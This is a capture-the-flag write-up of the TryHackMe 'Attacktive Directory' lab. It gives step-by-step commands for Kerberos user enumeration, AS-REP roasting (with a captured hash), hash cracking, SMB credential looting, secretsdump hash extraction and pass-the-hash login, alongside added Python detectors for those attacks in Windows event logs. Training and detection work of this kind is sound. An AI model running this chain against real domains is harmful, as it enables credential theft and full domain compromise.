TryHackMe – Attacktive Directory

Exploiting a Domain Controller: https://tryhackme.com/room/attacktivedirectory

Setup

# get Impacket
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
# install pip for Python3
sudo apt install python3-pip
# install prereqs
pip3 install -r /opt/impacket/requirements.txt
# install impacket
cd /opt/impacket && sudo python3 ./setup.py install

# install bloodhound and neo4j
sudo apt install bloodhound neo4j

Enumeration

nmap -sV -v 10.10.98.191 -A

We discovered many open ports, including an SMB share, a web server, Kerberos and LDAP.

The room also mentions a new tool called kerbrute, so I installed this to /opt. We can run it by calling /opt/kerbrute. We are also provided with a list of usernames and a list of passwords, which I saved to ~/thm/attacktive.

# this command runs user enumeration (does not lock accounts)
# --dc tells kerbrute the machine's IP (without looking up DNS)
# -d is the domain we discovered from nmap
# userlist.txt is our custom userlist we were supplied

/opt/kerbrute userenum --dc 10.10.98.191 -d spookysec.local  userlist.txt

We find a list of several usernames (james, svc-admin, robin, darkstar, administrator, backup, paradox). The most interesting ones are svc-admin and backup.

Abusing Kerberos

Now that we have some potential accounts, we can attempt to abuse a Kerberos feature with an attack method called AS-REP Roasting. This is possible when a user account has the option “Does not require Pre-Authentication” set, so the account in question does not need to provide valid identification before requesting a Kerberos ticket.

Impacket has a tool called GetNPUsers.py (/opt/impacket/examples/GetNPUsers.py) that we can use to query AS-REP roastable accounts from the Key Distribution Center. We need to supply a valid set of usernames, which we have already obtained from kerbrute.

# run the script, specify the domain name, user and the IP for the machine
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/backup -no-pass -dc-ip 10.10.98.191
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

# test it for svc-admin as well
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.98.191
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
[email protected]:556f8bce5464fd6ab023679ec4782bf6$2bdc8273a91332c6cff989002901adff5c36b4f33abb2ce444a3b491e76b3b240e8c642b665067cb4996549eb1f6b9971a39396efd442b12f8d94151f124d248e394ad3bd8eaf7154bd03c879486b97e09b35dc8c4d7b0ced462eb413576e01d381aa2ea01ae6fa9c2ba250249218a0cb22acd7f0f17685983d2a85add32c5ba4bd5b5f105c65acad6944062a42e595a3bab90ef486d450e357f27de9be188ca34ada6077e1214a251c43fafd64a833c2da925108cea6b81d4293eb05a2ad701fae11a4a5e2ef341eb8ff3b104a101bcda29672ecd3314ff8dbfef37425680546b303a4ed47142fa399f7c3e28786f3353f1

We got a hash back! Looking at the Hashcat example hashes wiki page, this appears to be Kerberos 5 AS-REP etype 23, which is mode 18200. We can save the full hash to a file and then specify the mode, hash file and dictionary like so:

hashcat -m 18200 hash.txt passwordlist.txt

And if we look at the end of our hash, we got the password for svc-admin!
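
With Kerberos Authentication Service auditing enabled, both the kerbrute enumeration and the AS-REP request above show up on the domain controller as Event ID 4768. The following Python is an added example, not part of the room or of Impacket: it flags both patterns in 4768 records and lists enabled accounts that have UF_DONT_REQUIRE_PREAUTH set. The event records, the directory export, the source addresses and the function names are constructed for illustration.

```python
from collections import defaultdict

UF_ACCOUNTDISABLE = 0x2
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the flag named in the GetNPUsers.py output

# Constructed directory export: sAMAccountName -> userAccountControl
ACCOUNTS = {"svc-admin": 0x410200, "backup": 0x10200, "old-svc": 0x400202}

def ev(user, status, preauth="-", etype="0xffffffff", ip="::ffff:10.10.50.7"):
    """Build one constructed 4768 record; keys follow the event's EventData names."""
    return {"TargetUserName": user, "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype, "IpAddress": ip}

# Constructed sample: five unknown principals, then one TGT issued without preauth.
EVENTS = ([ev(u, "0x6") for u in ("alice", "bob", "carol", "dave", "erin")]
          + [ev("svc-admin", "0x0", "0", "0x17"),
             ev("james", "0x0", "2", "0x12", ip="::ffff:10.10.50.20")])

def roastable(accounts):
    """Enabled accounts for which the KDC returns an AS-REP without preauth."""
    return sorted(name for name, uac in accounts.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)

def enumeration_sources(events, threshold=5):
    """Source IPs that asked for >= threshold distinct unknown principals."""
    seen = defaultdict(set)
    for e in events:
        if e["Status"].lower() == "0x6":  # KDC_ERR_C_PRINCIPAL_UNKNOWN
            seen[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(users) for ip, users in seen.items() if len(users) >= threshold}

def no_preauth_tgts(events):
    """Successful TGTs issued with PreAuthType 0; 0x17 is RC4, i.e. etype 23."""
    hits = []
    for e in events:
        if e["Status"].lower() == "0x0" and e["PreAuthType"] == "0":
            rc4 = e["TicketEncryptionType"].lower() == "0x17"
            hits.append((e["TargetUserName"], e["IpAddress"],
                         "rc4" if rc4 else "other"))
    return hits

if __name__ == "__main__":
    print("no-preauth accounts:", roastable(ACCOUNTS))
    print("enumeration sources:", enumeration_sources(EVENTS))
    print("no-preauth TGTs:", no_preauth_tgts(EVENTS))
```

Clearing the "Do not require Kerberos preauthentication" option on every account the first function returns removes the AS-REP exposure.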

Enumeration Pt 2 – With Credentials

Now that we have credentials, we can try to enumerate shares and use the credentials to get more details back.

We can run smbclient to get a list of shares:

smbclient -L 10.10.98.191 -U svc-admin
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Next I started going down the list with svc-admin’s credentials. We have access to the backup share, which we can open like so:

smbclient \\\\10.10.98.191\\backup -U svc-admin

And after running ls, we see a backup_credentials.txt file on the share. We cannot print the file, so we will have to see if we can grab it:

smbget -R smb://10.10.98.191/backup/ -U svc-admin
Password for [svc-admin] connecting to //backup/10.10.98.191: 
Using workgroup WORKGROUP, user svc-admin
smb://10.10.98.191/backup//backup_credentials.txt                                                    
Downloaded 48b in 7 seconds

Now we can cat backup_credentials.txt, and we get a base64-encoded string. We can decode it, and we get the credentials for backup!

Elevating Privileges

With our new credentials, we could have elevated access. This backup account could be the backup account for the entire Domain Controller, with permissions that allow all AD changes to be synced to it, including password hashes. We can use a different Impacket tool called secretsdump.py to retrieve all the password hashes we could have access to:

python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.98.191 -target-ip 10.10.98.191  [email protected]

And now we have a bunch of hashes! We can use an attack called Pass the Hash to log in using the administrator’s hash. There is a tool called Evil-WinRM that will allow us to use the hash; we just need to install it with sudo gem install evil-winrm, and then we can run this command to gain access:

evil-winrm -i 10.10.98.191 -u Administrator -H <hash>

And we are in! Now we can browse the file system, but as Admin, we could do pretty much whatever at this point.
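
The sync permission described above for the backup account is exercised through directory replication rights, which a domain controller records as Event ID 4662 when directory service access auditing is enabled. The following Python is an added example, not part of the room or of Impacket: it reports accounts other than the domain controller's machine account that used those rights. The event records, the allowlist and the function names are constructed for illustration; the host name comes from the compendium below.

```python
import re

# Schema GUIDs of the directory replication extended rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# The pair that lets a caller replicate password hashes.
NEEDED_FOR_SECRETS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
# Assumption: only DC machine accounts are expected to replicate.
EXPECTED_REPLICATORS = {"attactivedirec$"}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

def rec(user, mask, *guids):
    """Build one constructed 4662 record; keys follow the event's EventData names."""
    return {"SubjectUserName": user, "AccessMask": mask,
            "Properties": " ".join("{%s}" % g for g in guids)}

# Constructed sample: normal DC replication, two calls by backup, one unrelated read.
EVENTS = [
    rec("ATTACTIVEDIREC$", "0x100", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    rec("backup", "0x100", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    rec("backup", "0x100", "1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"),
    rec("james", "0x10", "bf967aba-0de6-11d0-a285-00aa003049e2"),
]

def dcsync_suspects(events, expected=EXPECTED_REPLICATORS):
    """Map each unexpected account to the replication rights it exercised."""
    found = {}
    for e in events:
        if not int(e["AccessMask"], 16) & 0x100:  # 0x100 = control access
            continue
        user = e["SubjectUserName"].lower()
        if user in expected:
            continue
        guids = (g.lower() for g in GUID_RE.findall(e["Properties"]))
        rights = {REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS}
        if rights:
            found.setdefault(user, set()).update(rights)
    return {user: sorted(rights) for user, rights in found.items()}

def can_dump_hashes(rights):
    """True when the observed rights include both halves of the required pair."""
    return NEEDED_FOR_SECRETS <= set(rights)

if __name__ == "__main__":
    for user, rights in dcsync_suspects(EVENTS).items():
        print(user, rights, "hash replication possible:", can_dump_hashes(rights))
```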

Machine Compendium

This is my own personal way of keeping track of all the information we have discovered:

{
	"MACHINE_IP": "10.10.98.191",
	"MACHINE_INFO" : {
		"os": "Windows",
		"host": "ATTACTIVEDIREC",
		"netbios_domain": "THM-AD",
		"dns_domain": "spookysec.local",
		"ntlm_prod_ver":"10.0.17763"
	},
	"OPEN_PORTS": {
		"53": ["domain", "Simple DNS Plus"],
		"80": ["http", "Microsoft IIS httpd 10.0"],
		"88": ["kerberos-sec", "Microsoft Windows Kerberos"],
		"135": ["msrpc", "Microsoft Windows RPC"],
		"139": ["netbios-ssn", "Microsoft Windows netbios-ssn"],
		"389": ["ldap", "Microsoft Windows Active Directory LDAP"],
		"445": "microsoft-ds?",
		"464": "kpasswd5?",
		"593": ["ncacn_http", "Microsoft Windows RPC over HTTP 1.0"],
		"636": "tcpwrapped",
		"3268": ["ldap", "Microsoft Windows Active Directory LDAP"],
		"3269": "tcpwrapped",
		"3389": ["ms-wbt-server", "Microsoft Terminal Services"]
	},
	"CREDENTIALS":"redacted-for-writeup",
	"OTHER_INFO": {
		"vulnerabilities": []
	}
	
}
